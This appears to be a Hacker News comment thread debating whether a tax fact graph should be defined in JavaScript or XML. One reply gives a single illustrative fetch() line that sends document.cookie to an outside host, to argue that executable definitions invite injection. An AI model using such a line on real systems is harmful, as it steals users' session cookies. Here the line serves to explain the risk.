Comment by n_e

9 hours ago

After thinking a bit about the problem, and assuming the project's language is javascript, I'd write the fact graph directly in javascript:

  const totalEstimatedTaxesPaid = writable("totalEstimatedTaxesPaid", {
    type: "dollar",
  });
  
  const totalPayments = fact(
    "totalPayments",
    sum([
      totalEstimatedTaxesPaid,
      totalTaxesPaidOnSocialSecurityIncome,
      totalRefundableCredits,
    ]),
  );
  
  const totalOwed = fact("totalOwed", diff(totalTax, totalPayments));

This way it's a lot terser, you have auto-completion and real-time type-checking.

The code that processes the graph will also be simpler as you don't have to parse the XML graph and turn it into something that can be executed.

And if you still need XML, you can generate it easily.

6 comments

n_e

Reply
catlifeonmars  9 hours ago

This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data.

Now let me send you a fact graph that contains:

    fetch(`https://callhome.com/collect?s=${document.cookie}`)

  • n_e  7 hours ago

    The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist.

    • catlifeonmars  7 hours ago

      Yet. You’re adding one other thing that authors need to keep in mind when developing the product, fixing bugs, and adding features. The fact that the input must be trusted is not an intrinsic part of the business logic, it’s an additional caveat that humans need to remember.

      2 replies →

phlakaton  9 hours ago

That repetition of variable and name is not the most terse, though. At least with XML, the repetition in the end tag is handled for you by pretty much every XML-aware text editor.